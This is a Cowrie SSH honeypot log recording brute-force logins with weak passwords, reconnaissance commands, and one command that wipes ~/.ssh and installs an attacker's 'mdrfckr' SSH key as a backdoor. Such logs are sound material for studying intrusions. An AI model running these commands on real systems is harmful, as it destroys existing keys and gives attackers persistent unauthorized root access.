{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-08T22:12:59.620543Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:59.874228Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:00.505839Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-08T22:13:00.506814Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:00.761281Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:01.282121Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T22:13:01.282959Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:01.537938Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:02.630383Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T22:13:02.631395Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:02.887463Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:03.458553Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T22:13:03.459690Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:03.714218Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54140,"dst_ip":"1.2.3.4","dst_port":22,"session":"db8c68b28e2c","protocol":"ssh","message":"New connection: 212.227.235.229:54140 (1.2.3.4:22) [session: db8c68b28e2c]","sensor":"my-vps","timestamp":"2025-09-08T22:13:03.977701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:03.978546Z","src_ip":"212.227.235.229","session":"db8c68b28e2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:04.143373Z","src_ip":"212.227.235.229","session":"db8c68b28e2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:04.693135Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T22:13:04.693858Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.login.failed","username":"terrariaserver","password":"terrariaserver","message":"login attempt [terrariaserver/terrariaserver] failed","sensor":"my-vps","timestamp":"2025-09-08T22:13:04.859591Z","src_ip":"212.227.235.229","session":"db8c68b28e2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:04.946639Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:05.541728Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T22:13:05.542454Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:05.797202Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:06.026718Z","src_ip":"212.227.235.229","session":"db8c68b28e2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:06.787074Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T22:13:06.787869Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:07.041255Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:07.631079Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T22:13:07.631776Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:08.601664Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:08.913772Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T22:13:08.914506Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:09.166409Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.closed","duration":"30.5","message":"Connection lost after 30.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:09.167554Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42478,"dst_ip":"1.2.3.4","dst_port":22,"session":"66bc8e739cd2","protocol":"ssh","message":"New connection: 212.227.235.229:42478 (1.2.3.4:22) [session: 66bc8e739cd2]","sensor":"my-vps","timestamp":"2025-09-08T22:13:12.855152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:12.885386Z","src_ip":"212.227.235.229","session":"66bc8e739cd2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:13.115960Z","src_ip":"212.227.235.229","session":"66bc8e739cd2"}
{"eventid":"cowrie.login.failed","username":"centos","password":"12345","message":"login attempt [centos/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:13:13.977087Z","src_ip":"212.227.235.229","session":"66bc8e739cd2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:15.183364Z","src_ip":"212.227.235.229","session":"66bc8e739cd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56452,"dst_ip":"1.2.3.4","dst_port":22,"session":"78062bc50022","protocol":"ssh","message":"New connection: 212.227.235.229:56452 (1.2.3.4:22) [session: 78062bc50022]","sensor":"my-vps","timestamp":"2025-09-08T22:13:27.967085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:27.968148Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:28.284753Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.login.success","username":"root","password":"123qwe,./","message":"login attempt [root/123qwe,./] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:13:29.591351Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:30.249712Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:13:30.250478Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:13:30.251719Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:30.568315Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:31.310875Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:13:31.311566Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:13:31.628860Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:31.629921Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51308,"dst_ip":"1.2.3.4","dst_port":22,"session":"490a932033c3","protocol":"ssh","message":"New connection: 212.227.235.229:51308 (1.2.3.4:22) [session: 490a932033c3]","sensor":"my-vps","timestamp":"2025-09-08T22:13:31.941414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:31.942265Z","src_ip":"212.227.235.229","session":"490a932033c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51146,"dst_ip":"1.2.3.4","dst_port":22,"session":"6489cfe9c43a","protocol":"ssh","message":"New connection: 212.227.235.229:51146 (1.2.3.4:22) [session: 6489cfe9c43a]","sensor":"my-vps","timestamp":"2025-09-08T22:13:32.294748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:32.295734Z","src_ip":"212.227.235.229","session":"6489cfe9c43a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:32.466891Z","src_ip":"212.227.235.229","session":"490a932033c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:32.630382Z","src_ip":"212.227.235.229","session":"6489cfe9c43a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:13:33.771786Z","src_ip":"212.227.235.229","session":"490a932033c3"}
{"eventid":"cowrie.login.failed","username":"mohammad","password":"123456789","message":"login attempt [mohammad/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T22:13:34.003563Z","src_ip":"212.227.235.229","session":"6489cfe9c43a"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:35.090083Z","src_ip":"212.227.235.229","session":"490a932033c3"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:35.239300Z","src_ip":"212.227.235.229","session":"e4a99eeb8b38"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:35.338915Z","src_ip":"212.227.235.229","session":"6489cfe9c43a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51314,"dst_ip":"1.2.3.4","dst_port":22,"session":"1edb50c0b843","protocol":"ssh","message":"New connection: 212.227.235.229:51314 (1.2.3.4:22) [session: 1edb50c0b843]","sensor":"my-vps","timestamp":"2025-09-08T22:13:35.423006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:35.423757Z","src_ip":"212.227.235.229","session":"1edb50c0b843"}
